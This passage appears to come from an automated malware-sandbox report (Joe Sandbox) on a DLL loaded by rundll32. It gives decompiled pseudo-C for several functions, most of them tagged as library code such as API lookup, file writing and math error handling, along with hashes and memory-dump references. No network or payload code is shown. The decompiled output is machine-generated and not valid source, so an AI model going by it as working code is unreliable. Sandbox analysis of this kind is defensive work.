				GetProcAddress(_t96);
				if (_t78 == 0) goto 0x535ed877;
				_t111 =  *0x53754140; // 0x9bd95a2971b4
				asm("dec eax");
				 *(0x7ffa535e0000 + 0x1755f0 + _t123 * 8) = _t78 ^ _t111;
				goto 0x535ed89b;
				goto 0x535ed82f;
				_t116 =  *0x53754140; // 0x9bd95a2971b4
				asm("dec eax");
				 *(0x7ffa535e0000 + 0x1755f0 + _t123 * 8) = _t97 ^ _t116;
				return 0;
			}



















                0x7ffa535ed718
                0x7ffa535ed71d
                0x7ffa535ed722
                0x7ffa535ed734
                0x7ffa535ed74f
                0x7ffa535ed756
                0x7ffa535ed760
                0x7ffa535ed768
                0x7ffa535ed76e
                0x7ffa535ed777
                0x7ffa535ed779
                0x7ffa535ed77c
                0x7ffa535ed784
                0x7ffa535ed78d
                0x7ffa535ed798
                0x7ffa535ed79d
                0x7ffa535ed79f
                0x7ffa535ed7ae
                0x7ffa535ed7b4
                0x7ffa535ed7c0
                0x7ffa535ed7cb
                0x7ffa535ed7cd
                0x7ffa535ed7d5
                0x7ffa535ed7db
                0x7ffa535ed7de
                0x7ffa535ed7ec
                0x7ffa535ed7f1
                0x7ffa535ed7f9
                0x7ffa535ed7fe
                0x7ffa535ed7fe
                0x7ffa535ed7fe
                0x7ffa535ed809
                0x7ffa535ed80e
                0x7ffa535ed817
                0x7ffa535ed820
                0x7ffa535ed832
                0x7ffa535ed83a
                0x7ffa535ed843
                0x7ffa535ed845
                0x7ffa535ed85e
                0x7ffa535ed864
                0x7ffa535ed86c
                0x7ffa535ed875
                0x7ffa535ed877
                0x7ffa535ed88b
                0x7ffa535ed891
                0x7ffa535ed8b7

                APIs
                • GetProcAddress.KERNEL32(?,00009BD95A2971B4,00000006,00007FFA535EDAE3,?,?,00000000,00007FFA535E8B23,?,?,00009BD95A2971B4,00007FFA535E8389), ref: 00007FFA535ED83A
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressProc
                • String ID:
                • API String ID: 190572456-0
                • Opcode ID: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction ID: e52e3fb4c5b8affbfb8a43defc3987157ecd289b4e0e31051c91c42c01c15d51
                • Opcode Fuzzy Hash: 5dc0bb12abbf4a7a14033368e2d0c6602d9198ce90f65ce4c3b152005258811c
                • Instruction Fuzzy Hash: D9411361F2AF428DFA159B12A80463523DBBF96B90F0DE534DD1D6B394EE3CE4049340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F0A88 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 84%
                			E00007FFA7FFA535F0A88(void* __ebx, signed int __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rdi, long long __rsi, long long _a8, long long _a16) {
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t48;

				_t54 = __rcx;
				_t51 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				if ((__ecx & 0x00000008) == 0) goto 0x535f0ab9;
				if (__edx >= 0) goto 0x535f0ab9;
				E00007FFA7FFA535EC21C(__rax, __rcx);
				goto 0x535f0b10;
				_t44 = 0x00000004 & dil;
				if (_t44 == 0) goto 0x535f0ad4;
				asm("dec eax");
				if (_t44 >= 0) goto 0x535f0ad4;
				E00007FFA7FFA535EC21C(__rax, _t54);
				goto 0x535f0b10;
				_t45 = dil & 0x00000001;
				if (_t45 == 0) goto 0x535f0af0;
				asm("dec eax");
				if (_t45 >= 0) goto 0x535f0af0;
				E00007FFA7FFA535EC21C(__rax, _t54);
				goto 0x535f0b10;
				_t46 = dil & 0x00000002;
				if (_t46 == 0) goto 0x535f0b10;
				asm("dec eax");
				if (_t46 >= 0) goto 0x535f0b10;
				if ((dil & 0x00000010) == 0) goto 0x535f0b0d;
				E00007FFA7FFA535EC21C(_t51, _t54);
				_t48 = dil & 0x00000010;
				if (_t48 == 0) goto 0x535f0b2a;
				asm("dec eax");
				if (_t48 >= 0) goto 0x535f0b2a;
				E00007FFA7FFA535EC21C(_t51, _t54);
				return;
			}







                0x7ffa535f0a88
                0x7ffa535f0a88
                0x7ffa535f0a88
                0x7ffa535f0a8d
                0x7ffa535f0aa4
                0x7ffa535f0aa8
                0x7ffa535f0aaf
                0x7ffa535f0ab7
                0x7ffa535f0abe
                0x7ffa535f0ac1
                0x7ffa535f0ac3
                0x7ffa535f0ac8
                0x7ffa535f0aca
                0x7ffa535f0ad2
                0x7ffa535f0ad4
                0x7ffa535f0ad8
                0x7ffa535f0ada
                0x7ffa535f0adf
                0x7ffa535f0ae6
                0x7ffa535f0aee
                0x7ffa535f0af0
                0x7ffa535f0af4
                0x7ffa535f0af6
                0x7ffa535f0afb
                0x7ffa535f0b01
                0x7ffa535f0b08
                0x7ffa535f0b10
                0x7ffa535f0b14
                0x7ffa535f0b16
                0x7ffa535f0b1b
                0x7ffa535f0b22
                0x7ffa535f0b40

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction ID: 83885d8ba2104064e4ed76b75ce5aeb04fb968a19f196ac4118698f778bbb879
                • Opcode Fuzzy Hash: 9e637d860787cd7530e08ec34b9611fe00c3f0bd966f6bff25759c960a0e2ccc
                • Instruction Fuzzy Hash: 951160B6E78F031DF6581368E85137D114B6FD63A8E4CE634EAAE275D68E6CA4448200
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F4118 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E00007FFA7FFA535F4118(void* __eax, void* __ecx, signed int __edx, void* __esi, void* __ebp, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				int _t34;
				long _t38;
				signed int _t40;
				void* _t46;
				int _t51;
				void* _t62;
				signed long long _t63;
				short* _t68;
				signed int* _t69;
				void* _t85;
				void* _t92;
				void* _t98;
				void* _t101;
				void* _t104;
				void* _t105;

				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFA7FFA535F54B0(__ecx, _t62, __rcx, _t85, __r8, _t98, _t101);
				_t63 =  *0x53754140; // 0x9bd95a2971b4
				_a5176 = _t63 ^ _t92 - _t62;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t105 = _t104 + __r8;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] =  *((intOrPtr*)(0x53754e50 + (__edx >> 6) * 8));
				if (__r8 - _t105 >= 0) goto 0x535f425b;
				_t68 =  &_a40;
				if (__r8 - _t105 >= 0) goto 0x535f41c3;
				_t40 =  *__r8 & 0x0000ffff;
				if (_t40 != 0xa) goto 0x535f41af;
				 *_t68 = 0xd;
				_t69 = _t68 + 2;
				 *_t69 = _t40;
				if ( &(_t69[0]) -  &_a1744 < 0) goto 0x535f4191;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				_t34 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				_t51 = _t34;
				if (_t34 == 0) goto 0x535f4253;
				if (_t34 == 0) goto 0x535f4243;
				_v8 = _v8 & 0x00000000;
				r8d = _t51;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x535f4253;
				if (0 + _a24 - _t51 < 0) goto 0x535f4210;
				__rcx[1] = _t46 - r15d;
				goto 0x535f4186;
				_t38 = GetLastError();
				 *__rcx = _t38;
				E00007FFA7FFA535F51E0();
				return _t38;
			}




















                0x7ffa535f4118
                0x7ffa535f411d
                0x7ffa535f412f
                0x7ffa535f4137
                0x7ffa535f4141
                0x7ffa535f4152
                0x7ffa535f4160
                0x7ffa535f4164
                0x7ffa535f417c
                0x7ffa535f417f
                0x7ffa535f4186
                0x7ffa535f418c
                0x7ffa535f4194
                0x7ffa535f4196
                0x7ffa535f41a1
                0x7ffa535f41a8
                0x7ffa535f41ab
                0x7ffa535f41af
                0x7ffa535f41c1
                0x7ffa535f41c3
                0x7ffa535f41ce
                0x7ffa535f41dc
                0x7ffa535f41ef
                0x7ffa535f41f4
                0x7ffa535f41fe
                0x7ffa535f4204
                0x7ffa535f4208
                0x7ffa535f420e
                0x7ffa535f4210
                0x7ffa535f4225
                0x7ffa535f422e
                0x7ffa535f4239
                0x7ffa535f4241
                0x7ffa535f4248
                0x7ffa535f424e
                0x7ffa535f4253
                0x7ffa535f4259
                0x7ffa535f4269
                0x7ffa535f4289

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiWideWrite
                • String ID: U
                • API String ID: 2456169464-4171548499
                • Opcode ID: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction ID: b0f83e618ff7f4f053d1a05c155f389c7799a95f2fe479626a6fe59c853baba3
                • Opcode Fuzzy Hash: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction Fuzzy Hash: A241F2A2B28B8186E7209F25E8447AE67A6FBD9780F489031EE4D97788DF3CD010C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E8A30 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 71%
                			E00007FFA7FFA535E8A30(void* __ecx, void* __fp0, void* __rax, long long __rbx, void* __r9, long long _a8) {
				long _t3;
				void* _t4;
				void* _t6;
				void* _t9;
				intOrPtr _t12;
				intOrPtr _t15;
				void* _t25;
				void* _t29;
				void* _t31;
				void* _t34;
				void* _t35;
				void* _t39;

				_t27 = __rbx;
				_t25 = __rax;
				_a8 = __rbx;
				_t3 = GetLastError();
				_t12 =  *0x53754160; // 0x6
				if (_t12 == 0xffffffff) goto 0x535e8a5a;
				_t4 = E00007FFA7FFA535EDA58(_t3, _t12 - 0xffffffff, __rax, __rbx, _t29, _t35);
				if (__rax != 0) goto 0x535e8a9b;
				E00007FFA7FFA535E7FB0(_t4, _t29, _t31);
				_t34 = _t25;
				if (_t25 != 0) goto 0x535e8a7a;
				_t6 = E00007FFA7FFA535E7E58(_t25, _t29);
				goto 0x535e8ab6;
				_t15 =  *0x53754160; // 0x6
				if (E00007FFA7FFA535EDAB0(_t6, _t25, _t25, _t27, _t29, _t25, _t35) == 0) goto 0x535e8a73;
				E00007FFA7FFA535E879C(_t15, __fp0, _t34, _t39);
				_t9 = E00007FFA7FFA535E7E58(_t25, _t34);
				if (_t34 == 0) goto 0x535e8ab6;
				SetLastError(??);
				return _t9;
			}















                0x7ffa535e8a30
                0x7ffa535e8a30
                0x7ffa535e8a30
                0x7ffa535e8a3a
                0x7ffa535e8a40
                0x7ffa535e8a4b
                0x7ffa535e8a4d
                0x7ffa535e8a58
                0x7ffa535e8a64
                0x7ffa535e8a69
                0x7ffa535e8a6f
                0x7ffa535e8a73
                0x7ffa535e8a78
                0x7ffa535e8a7a
                0x7ffa535e8a8d
                0x7ffa535e8a8f
                0x7ffa535e8a96
                0x7ffa535e8a9e
                0x7ffa535e8aa2
                0x7ffa535e8ab5

                APIs
                • GetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8A3A
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AA2
                • SetLastError.KERNEL32(?,?,?,00007FFA535EE8F5,?,?,?,?,?,?,?,00007FFA535EEAAD), ref: 00007FFA535E8AB8
                • abort.LIBCMT ref: 00007FFA535E8ABE
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLast$abort
                • String ID:
                • API String ID: 1447195878-0
                • Opcode ID: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction ID: 41d6bc8505a41966eb2bf847cbed8b94652b182d55b5b757ed1cf7b8d335e363
                • Opcode Fuzzy Hash: eec2c14e0966c9bea527e14d519690d7303d22ce24e7ab342e75b1017aa929f8
                • Instruction Fuzzy Hash: EE018C21F39F464EFA59A731A55513D119B5FC6BA0F0CE478ED2E227D2ED2CF8456200
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EA718 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON
                Download Yara Rule
                C-Code - Quality: 34%
                			E00007FFA7FFA535EA718(void* __eax, signed int __ecx, void* __rbx, intOrPtr _a8, intOrPtr _a16, signed long long _a24, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64) {
				signed int _t39;
				signed int _t43;
				signed int _t44;
				void* _t47;
				void* _t49;
				void* _t54;
				void* _t56;
				signed long long _t81;
				signed long long _t82;
				signed long long _t84;
				signed long long _t86;
				unsigned long long _t87;

				asm("movss [esp+0x8], xmm0");
				asm("movaps xmm4, xmm1");
				asm("movaps xmm1, xmm0");
				asm("xorps xmm2, xmm2");
				asm("cvtss2sd xmm2, xmm1");
				asm("xorps xmm3, xmm3");
				asm("movsd [esp+0x70], xmm2");
				_t81 = _a24;
				asm("cvtss2sd xmm3, xmm4");
				_t84 = _t81 & 0xffffffff;
				asm("movsd [esp+0x70], xmm3");
				_t87 = _a24;
				_t86 = _t87 & 0xffffffff;
				_t39 = __ecx & 0x000007ff;
				_t44 = _t43 & 0x000007ff;
				if (_t39 - 1 < 0) goto 0x535ea8c4;
				if (_t39 - 0x7fe > 0) goto 0x535ea8cc;
				if ((_t87 >> 0x34) - 1 - 0x7fd > 0) goto 0x535ea8c4;
				if (_t84 != _t86) goto 0x535ea7c2;
				_t82 = _t81 & 0x00000000;
				_a24 = _t82;
				asm("movsd xmm0, [esp+0x70]");
				asm("cvtpd2ps xmm0, xmm0");
				goto 0x535ea957;
				_a24 = _t84;
				asm("movsd xmm2, [esp+0x70]");
				_a24 = _t86;
				asm("movsd xmm3, [esp+0x70]");
				_t54 = _t84 - _t86;
				if (_t54 >= 0) goto 0x535ea7f8;
				asm("xorps xmm0, xmm0");
				asm("comiss xmm0, xmm1");
				if (_t54 <= 0) goto 0x535ea7ec;
				asm("xorps xmm2, [0x86974]");
				asm("xorps xmm0, xmm0");
				asm("cvtsd2ss xmm0, xmm2");
				goto 0x535ea957;
				asm("stmxcsr dword [esp+0x68]");
				r8d = _a16;
				if (_t39 - _t44 <= 0) goto 0x535ea87c;
				_t47 = (0x2aaaaaab * (_t39 - _t44) >> 0x20 >> 2) + (0x2aaaaaab * (_t39 - _t44) >> 0x20 >> 2 >> 0x1f);
				_a24 = 0x3ff << 0x34;
				asm("movsd xmm0, [esp+0x70]");
				asm("mulsd xmm0, xmm3");
				_a24 = 0;
				asm("movsd xmm4, [esp+0x70]");
				asm("movaps xmm3, xmm0");
				_t56 = _t47;
				if (_t56 <= 0) goto 0x535ea87c;
				asm("movaps xmm0, xmm2");
				asm("divsd xmm0, xmm3");
				asm("cvttsd2si eax, xmm0");
				asm("movd xmm1, eax");
				asm("cvtdq2pd xmm1, xmm1");
				asm("mulsd xmm1, xmm3");
				asm("mulsd xmm3, xmm4");
				asm("subsd xmm2, xmm1");
				if (_t56 != 0) goto 0x535ea857;
				asm("movaps xmm0, xmm2");
				_a16 = r8d;
				asm("divsd xmm0, xmm3");
				asm("cvttsd2si eax, xmm0");
				asm("movd xmm1, eax");
				asm("cvtdq2pd xmm1, xmm1");
				asm("mulsd xmm1, xmm3");
				asm("subsd xmm2, xmm1");
				asm("movsd [esp+0x70], xmm2");
				asm("ldmxcsr dword [esp+0x68]");
				asm("xorps xmm0, xmm0");
				asm("comiss xmm0, [esp+0x60]");
				asm("movaps xmm0, xmm2");
				if (_t56 <= 0) goto 0x535ea8bb;
				asm("xorps xmm0, [0x868a5]");
				asm("cvtsd2ss xmm0, xmm0");
				goto 0x535ea957;
				if (_t47 - 0x7fe <= 0) goto 0x535ea8e3;
				if ((0xffffffff & _t82) == 0) goto 0x535ea917;
				asm("movss [esp+0x60], xmm1");
				goto 0x535ea900;
				if (_t47 - 0x7fe <= 0) goto 0x535ea90d;
				if ((0xffffffff & _t87) == 0) goto 0x535ea957;
				asm("movss [esp+0x60], xmm4");
				goto 0x535f0dbc;
				if (_a8 - 1 >= 0) goto 0x535ea917;
				if (_t47 - 1 >= 0) goto 0x535ea957;
				_a64 = 2;
				asm("movss [esp+0x38], xmm4");
				r9d = 1;
				asm("movss [esp+0x30], xmm1");
				r8d = 0xffc00000;
				_a40 = 0x21;
				_a32 = 8;
				return E00007FFA7FFA535F0C6C(0x3ff, _a8, _t49, _t47 - 1, 0x53671ccc, _t87 >> 0x34, _t82);
			}















                0x7ffa535ea718
                0x7ffa535ea72c
                0x7ffa535ea72f
                0x7ffa535ea732
                0x7ffa535ea735
                0x7ffa535ea739
                0x7ffa535ea73c
                0x7ffa535ea742
                0x7ffa535ea747
                0x7ffa535ea751
                0x7ffa535ea758
                0x7ffa535ea75e
                0x7ffa535ea769
                0x7ffa535ea775
                0x7ffa535ea777
                0x7ffa535ea77c
                0x7ffa535ea788
                0x7ffa535ea796
                0x7ffa535ea79f
                0x7ffa535ea7ab
                0x7ffa535ea7ae
                0x7ffa535ea7b3
                0x7ffa535ea7b9
                0x7ffa535ea7bd
                0x7ffa535ea7c2
                0x7ffa535ea7c7
                0x7ffa535ea7cd
                0x7ffa535ea7d2
                0x7ffa535ea7d8
                0x7ffa535ea7db
                0x7ffa535ea7dd
                0x7ffa535ea7e0
                0x7ffa535ea7e3
                0x7ffa535ea7e5
                0x7ffa535ea7ec
                0x7ffa535ea7ef
                0x7ffa535ea7f3
                0x7ffa535ea7f8
                0x7ffa535ea7fd
                0x7ffa535ea804
                0x7ffa535ea817
                0x7ffa535ea834
                0x7ffa535ea839
                0x7ffa535ea83f
                0x7ffa535ea843
                0x7ffa535ea848
                0x7ffa535ea84e
                0x7ffa535ea851
                0x7ffa535ea853
                0x7ffa535ea857
                0x7ffa535ea85a
                0x7ffa535ea85e
                0x7ffa535ea862
                0x7ffa535ea866
                0x7ffa535ea86a
                0x7ffa535ea86e
                0x7ffa535ea872
                0x7ffa535ea87a
                0x7ffa535ea87c
                0x7ffa535ea87f
                0x7ffa535ea884
                0x7ffa535ea888
                0x7ffa535ea88c
                0x7ffa535ea890
                0x7ffa535ea894
                0x7ffa535ea898
                0x7ffa535ea89c
                0x7ffa535ea8a2
                0x7ffa535ea8a7
                0x7ffa535ea8aa
                0x7ffa535ea8af
                0x7ffa535ea8b2
                0x7ffa535ea8b4
                0x7ffa535ea8bb
                0x7ffa535ea8bf
                0x7ffa535ea8ca
                0x7ffa535ea8d9
                0x7ffa535ea8db
                0x7ffa535ea8e1
                0x7ffa535ea8e9
                0x7ffa535ea8f8
                0x7ffa535ea8fa
                0x7ffa535ea908
                0x7ffa535ea910
                0x7ffa535ea915
                0x7ffa535ea917
                0x7ffa535ea926
                0x7ffa535ea92c
                0x7ffa535ea932
                0x7ffa535ea938
                0x7ffa535ea93e
                0x7ffa535ea946
                0x7ffa535ea95b

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: !$fmodf
                • API String ID: 2315412904-1366221206
                • Opcode ID: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction ID: bffad52782ab9adb1ac216f743baebd478a33d63fd8551fb4a0f8024e73271d4
                • Opcode Fuzzy Hash: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction Fuzzy Hash: A851EC32D2CF854BD612C7355441239A2A6EFD7390F14D336FA5E76AE5DB2CE4829E00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E848C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileHandleType
                • String ID: @
                • API String ID: 3000768030-2766056989
                • Opcode ID: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction ID: 618d5276e47d146b9cf9da45befc5598c52de1a1d90d6f3e986a99bd73336b0b
                • Opcode Fuzzy Hash: 4f5111625b1407a19fdabbefee9c8c7e3abfb380d48dda17de014767798d5151
                • Instruction Fuzzy Hash: CB218862A28F5249E7658B24D490139265AEFC6F74F2C6376D67F277D4CE38D481E300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535ED26C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E00007FFA7FFA535ED26C(signed int __ecx, void* __r9, signed long long _a16, intOrPtr _a32, intOrPtr _a40, intOrPtr _a64) {
				void* _t17;
				signed int _t18;
				signed char _t19;
				void* _t23;
				signed int _t27;
				signed long long _t37;

				asm("movsd [esp+0x8], xmm0");
				asm("movsd [esp+0x68], xmm0");
				_t37 = _a16;
				if ((_t37 & 0x00000000) != 0) goto 0x535ed30c;
				if ((0xffffffff & _t37) == 0) goto 0x535ed2b1;
				goto 0x535f0da0;
				if ((0x00000000 & _t37) == 0) goto 0x535ed30c;
				asm("movsd xmm1, [esp+0x60]");
				r9d = 1;
				asm("xorps xmm0, xmm0");
				_a64 = r9d;
				asm("movsd [esp+0x38], xmm0");
				asm("movsd [esp+0x30], xmm1");
				_a40 = 0x21;
				_a32 = 8;
				_t18 = E00007FFA7FFA535F0B44(_t17, __ecx, _t23, 0x00000000 & _t37, 0x53671efc, _t37, 0);
				goto 0x535ed33a;
				_t27 = 0xffffffff & _t37;
				asm("dec eax");
				_t19 = _t18 & 0xffffff00 | _t27 > 0x00000000;
				if ((_t19 & (__ecx & 0xffffff00 | _t27 != 0x00000000)) != 0) goto 0x535ed2c0;
				asm("sqrtsd xmm2, [esp+0x60]");
				asm("movsd [esp+0x70], xmm2");
				asm("movsd xmm0, [esp+0x70]");
				return _t19;
			}









                0x7ffa535ed26c
                0x7ffa535ed280
                0x7ffa535ed286
                0x7ffa535ed294
                0x7ffa535ed2a3
                0x7ffa535ed2ac
                0x7ffa535ed2be
                0x7ffa535ed2c0
                0x7ffa535ed2cd
                0x7ffa535ed2d3
                0x7ffa535ed2d6
                0x7ffa535ed2e5
                0x7ffa535ed2eb
                0x7ffa535ed2f1
                0x7ffa535ed2fd
                0x7ffa535ed305
                0x7ffa535ed30a
                0x7ffa535ed316
                0x7ffa535ed31c
                0x7ffa535ed321
                0x7ffa535ed326
                0x7ffa535ed328
                0x7ffa535ed32e
                0x7ffa535ed334
                0x7ffa535ed33e

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$sqrt
                • API String ID: 1757819995-799759792
                • Opcode ID: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction ID: 4a54b17e134f0adf238fc96ea45de3cbe74dd13ad5ec81118c7a93bf6dbe069b
                • Opcode Fuzzy Hash: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction Fuzzy Hash: E111B472928F8586DE41CF11A50032A66A6EFDB7E4F24D335EA6C16BC8DF2CE0419B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F20EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00007FFA7FFA535F20EB(void* __eax, void* __ecx, void* __rax) {

				asm("rcr dword [ebp+0x816ee0d], 1");
				 *((intOrPtr*)(__rax - 0x7d)) =  *((intOrPtr*)(__rax - 0x7d)) + __ecx;
				asm("loopne 0x5");
				return __eax;
			}



                0x7ffa535f20eb
                0x7ffa535f20f1
                0x7ffa535f20f4
                0x7ffa535f20f6

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
